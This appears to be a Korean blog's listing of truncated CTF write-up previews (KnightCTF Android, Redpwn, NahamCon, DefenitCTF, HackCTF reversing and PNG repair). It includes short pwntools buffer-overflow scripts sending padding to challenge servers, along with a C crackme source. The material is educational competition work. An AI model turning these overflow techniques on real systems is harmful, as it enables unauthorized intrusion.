CTF
KnightCTF - Droid Flag
Droid Flag - 100 이번 KnightCTF 문제 풀면서 안드로이드 관련 문제가 나왔는데 워겜이나 변조 앱 분석은 했어도 CTF 문제는 처음이라 풀이를 남긴다. Analysis Application 앱 실행 후 확인해보면 다음과 같은 부분을 확인할 수 있다. “Enter Flag”라는 안내 문구가 적혀있으며, 사용자가 입력할 수 있는 칸 “VALIDATE”라는 문자열이 적힌 Flag 인증 버튼 Source Code MainActivity 디컴파일러를 이용하여 APK를 열어준 후 MainActivity를 확인하기 위해 AndroidManifest 파일을 통해 이를 확인해준다. MainActivity를 확인해보면 이런저런 코드를 확인할 수 있는데 여기서 중요한 부분은 이전에 확인해본 것과 같이 값을..
Redpwn CTF
작년에 재미있게 했던 기억이 있어서 올해에도 빠지지 않고 참여했습니다. 기말시험이나 BoB최종 발표랑 겹쳐서 많이 투자하지는 못했지만 올해도 재밌었습니다. 특히, 작년에 비해 서버가 괜찮았습니다. 작년에는 펑펑 터지던거로 기억하고있어서... 내년에는 좀 더 높은 등수를 노릴 수 있도록 더욱 노력하겠습니다. SOLVED Pwnable coffer-overflow-0 from pwn import * p=remote("2020.redpwnc.tf", 31199) py = 'A'*28 p.sendlineafter("with?",py) p.interactive() coffer-overflow-1 from pwn import * p=remote("2020.redpwnc.tf",31255) py = '' py = '..
NahamCon CTF
거의 끝나기 직전에? 참여해서 포너블 2문제 정도 풀었다. 문제수도 많고 너무 어려운 정도도 아니여서 좀더 빨리 알았으면.... SOLVED Binary Exploitation Dangerous signed __int64 __usercall main@(char **a1@, char **a2@, __int64 a3@) { __int64 v3; // rax signed __int64 result; // rax signed __int64 v5; // [rsp-218h] [rbp-218h] signed __int64 v6; // [rsp-210h] [rbp-210h] signed __int64 v7; // [rsp-208h] [rbp-208h] signed __int64 v8; // [rsp-200h] [rbp..
DefenitCTF 후기
저희 동아리는 최종적으로 71등을 달성하였습니다. (초반에 10등 찍고 못내려온게 아쉽)개인적으로 많이 아쉬운 CTF였습니다. 각 잡고 준비도 하고 3일 연속으로 진행하고싶었지만 bob준비나 ccit 과제나 여러 가지 겹쳐서 그러지도 못하고 진행 동안에도 중요한 약속으로 첫날 밖에 진행 못한점이 많이 아쉬웠습니다....그래도 저희 동아리 신입생이나 CTF를 경험해보지 못한 친구들이 값진 경험을 했다고 생각하고 저 또한 첫날은 시간 가는지 모르고 재밌게 진행했던것 같습니다. 올해 이런 멋진 대회 열어주신 데피닛 + 관계자분들 정말 수고하셨습니다! , 내년에도 열어주시면 Pwnable문제 올클 할정도로 성장해보이겠습니다!
HackCTF Reversing Me
Writeup information #include #include int main() { int i; char *serial = "H`cjCUFzhdy^stcbers^D1_x0t_jn1w^r2vdrre^3o9hndes1o9>}"; char enter[54]; printf("키를 입력하시게 : "); scanf("%s", enter); if (strlen(enter) == strlen(serial)) { for (i = 0; i < strlen(serial) && (enter[i] ^ (i % 2)) == serial[i]; i++); if (i - 1 == strlen(enter)) printf("정답일세!\n"); } else printf("그건 아닐세...\n"); exit(0); } 문제는 위..
HackCTF Magic PNG
전에 프로젝트 진행하면서 PNG 구조 알아본 적이 있는데 덕분에 쉽게 풀었던 문제이다. Writeup File information 문제 파일을 다운 받고 압축을 해제하면 다음과 같이 png파일이 하나 있다. 이 파일은 깨져서 열어도 아무것도 볼 수 없는 파일이다. Solve 이 문제는 PNG format을 조금 알아보면 쉽게 풀 수 있는 문제이다. PNG의 시그니쳐 89 50 4E 47 0D 0A 1A 0A PNG에는 크게 세 청크가있다. IHDR (49 48 44 52) iHDR은 말 그대로 헤더 즉 PNG의 여러 메타 데이터가 저장된다. IDAT (49 44 41 54) 실제로 이미지에 대한 데이터가 저장된다. IEND (49 45 4E 44) 파일의 끝을 알려주는 청크 먼저 HxD or 010 e..